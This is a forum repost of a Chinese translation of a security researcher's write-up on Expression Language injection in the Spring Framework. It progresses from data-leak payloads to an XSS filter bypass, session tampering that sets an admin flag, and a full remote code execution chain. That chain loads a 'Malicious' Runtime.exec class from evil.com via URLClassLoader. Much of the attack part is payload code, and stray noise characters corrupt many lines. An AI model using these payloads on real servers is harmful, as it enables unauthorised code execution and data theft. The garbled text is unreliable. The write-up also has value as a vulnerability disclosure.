Remote Code with6 A; j# m$ ~% }6 U
Expression Language Injection
7 \9 a, l( J/ t4 u: J% ^$ QSpring Framework脆弱性—DanAmodio$ J L( w" a. H! B; B2 L
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中; d; Y T4 b- E% H2 f" E; J* V
可能会存在风险。" K$ V, h1 d% D' H
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的/ J9 k {0 |- ^* K* ]. \8 q( k
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可. c9 a: P8 Q; j1 a- s6 n
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,; ~( b* U1 r6 b
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
- L! Y! F* S8 w% a) N6 s版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
; t. I! W3 s; ^$ i& R! S6 K, Y- t' l# y由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
. E: \$ B4 y! ] [9 D. B# n我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版+ V, O8 k9 n' W9 J7 x. `
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。$ s: {6 b. T8 Y& s" R9 R
这些版本不支持禁用double EL resolution.( d+ n! W& D; v& o6 Q
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含6 [1 J3 [* T3 n0 |" M8 j
EL2.2容器上可能进行远程代码执行。$ C; T0 @: T. P, s! O8 {+ G- P
这是一个原始信息泄露的攻击例子:! R7 e/ | ^ _4 ?( e, D
请求:
I, X) i) x9 l7 jttp://vulnerable.com/foo?message=${applicationScope}' S) n: ~7 u0 t X U H! Z9 v
到达以下内容页面:6 ?. S; N9 ~# l7 p( I' ^
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
4 I" {9 k. ~0 v$ `你也可以做一些其他事情,如这样:5 F) h4 a, |. k' R
${9999+1}
9 i9 T6 _) W# c$ w, o* x+ e3 ^还可以访问session 对象和beans
0 J2 q0 B+ }0 @# G${employee.lastName}4 G X/ x) e! D ]' W" j
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是! k1 X5 ?# a0 {; r. j, ~& c
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
; ?) s4 L' ~: b7 }& N西,比如XSS.
" Z g. T8 w- b8 S哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签- V0 w" X3 i8 b# |2 Y ?
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
/ C# K' l- U* n/ J呢?”
& h' Q6 V! B2 L因此,我尝试巳缦拢�$ C4 K- |4 I0 c$ @* R6 O% _3 k
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
) {: r7 G, z, D9 q( TP7 [1 m: n9 W a: j4 P0 ?3 b
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返7 K& a) f4 X( W1 z# @9 q3 \
回的文本被插入进了spring:message 标签。8 N, l9 H r/ D4 \+ W; N
这里是一个最终绕过过滤的实例:/ \) B( a' m W" h' h
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ6 d" G2 U$ I* g7 y- `, R1 b( [
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
4 ~- P+ g# M x什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?% ^& N3 d3 X0 N
经过一番研究,我学习到EL2.2 增加了方法调用。
8 u# `; E$ H: s0 B/ M# I我写了一个快速测试应用程序代码并且检测一些功能! ^4 k1 u5 V+ `+ u( a* Y" \
${pageContext.request.getSession().setAttribute(“account”,”123456″)}4 d' j0 j( C |6 z0 t' _ x( I, J
${pageContext.request.getSession().setAttribute(“admin”,true)}
6 f F- u6 L* l% h; Z好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
' h* z1 a$ X; e$ X( @- `+ o指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?' u5 K2 P" w9 V7 t! s6 B
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.16 x" F) U0 O4 b4 L, M5 L
“, 1234)}
0 ]4 |) ]$ I9 |2 ^6 s3 `${“”.getClass().forName(“java.lang.Runtime”)}
4 @* S4 Y7 H* r: t/ N7 u8 U8 E哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不1 F. h. j! Y3 ^; m/ W
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函- v% i& }2 a( q8 R; s4 I
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有4 R" j7 h) V: Z, n/ t2 T4 O
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于5 b0 A4 a- y6 N: U$ _0 Q
方法签名invoke(Object obj, Object„ args)
6 s2 D3 E# w0 s( zJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问 ]0 C' }( ?" s' t
题,以让它可以工作起来。7 F" R; u* k% h7 g! O9 q- S* B9 u5 D0 [
漏洞利用:
5 { \% T+ v( r0 [5 ?4 U1 q我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
6 A& y. v8 [6 z" [8 K: B/ I希望你们中的一些JAVA奇才告诉我我是如此的可笑。
+ a4 { e# \+ [" B% z" g) c这里有一些我试过的失败的用例,为了试图让它工作的用例:, T- [; R+ v+ m; c6 l
写文件到文件系统" |5 O) R2 s1 | ^% O" r
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.6 {" ]/ ?5 K/ K' {3 E R' ~
我认为这些可以很好的工作,但是我不能找到合适的类来载入。6 b5 b/ \+ d; c0 K, P) e2 ^3 L
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
7 G2 t/ I5 r% {+ G5 y, E1 Q* bjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:7 ?9 U2 r8 y+ q: C
org.springframework.expression.spel.standard.SpelExpressionParser not found( L- \ @' a8 V3 Q
by: x) P+ Q) R' {" ?+ n) v2 o& ~' k
org.glassfish.web.javax.servlet.jsp [194].* @8 @# y+ q8 i, B, B& a5 O
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public7 ^% H0 R- h- q' d
利用反射来创建一个新的Runtime(and watch the world burn)
5 p1 X; f7 Z2 v: h m, \${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName6 [! A9 H' y. ?; \3 T; j; M# z3 y
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
7 X( |0 t O+ s2 C/ C& k) h. G( X${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
% m" L& z2 E8 T 使用java.lang.ProcessBuilder
5 `9 q: G- J# Y0 c5 }* `, s: D( ? 用表达式语言来评估表达式语言
* F, i3 R* j s) c5 r& NExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.2 V& X( z, o3 D& H5 [
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
/ r0 p1 e% x; p* n0 |8 u: E+ c“,”".getClass(),null)}: o! S" {2 B% p& x. X
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)/ K! I' p3 R5 k6 a' @
我在使用一个空数组通过Method.invoke()时失败了很多次/ @' s' B/ a( L* w/ D
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
+ i- h2 i$ {; U4 A.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A2 y, j/ w: x, Z0 k
rrayList”).newInstance().toArray())
+ m. A% G. {1 ~) M/ S/ `java.lang.IllegalArgumentException: wrong number of arguments2 V0 Q1 K O) v
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
6 P' z; Z+ s$ ~以创建一个恶意class文件并且指向类装载器.
. g$ h& V+ c& h, I ~# u, ^我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
/ o6 O8 _, p& F- C, s5 E! T6 Ipublic class Malicious {$ q% v, c+ i% n+ u% g$ d: q1 m
public Malicious() {
* _% Q9 a7 L& a9 {/ |1 Rtry {" a5 T+ G$ n8 {$ W/ a
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac1 r' w2 r" u1 p8 i, S+ ~8 R
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win. @8 L5 }/ A8 z% q. [
} catch (Exception e) {
+ J$ R* r& P' `. W! S}
& g% P0 C1 `7 y}
) A% D( f) a: q7 q我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回2 b7 c- a1 M( L! I* `$ @
话中,因此它可以被使用.
4 b* @9 X: [' b${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
, Q1 e# N& \( t" W9 t: @4 Q(“java.util.ArrayList”).newInstance())}* w. E$ c% r( f( h) @/ R
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建: L, S# K$ c1 E: k7 J: i6 N% e
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和. o' ? l! @* I/ b3 z4 t$ J
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
M# w1 m) @! o6 U) ^* T* B我们可以调用的create(string)方法,然后转换对一个URL对象。) w& H) I8 u* M9 ?9 ?* Y3 j" [
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh {0 u6 e" S/ S* s
ere/malicious/classfile/is/located/”).toURL())}
6 t, m( j3 p% v1 X) J1 S: Z R j然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,) s6 s' ?' y* H# }. e
恶意类文件被装载并创建,触发远程代码., z2 M9 h! `+ D. D0 `
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
6 s9 z8 F X" y! J% |; N4 j, T& `, xxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
& {9 B( x. z1 U- d# \! k- t' W* a# ZgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance; `" C- h7 e/ E+ U
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对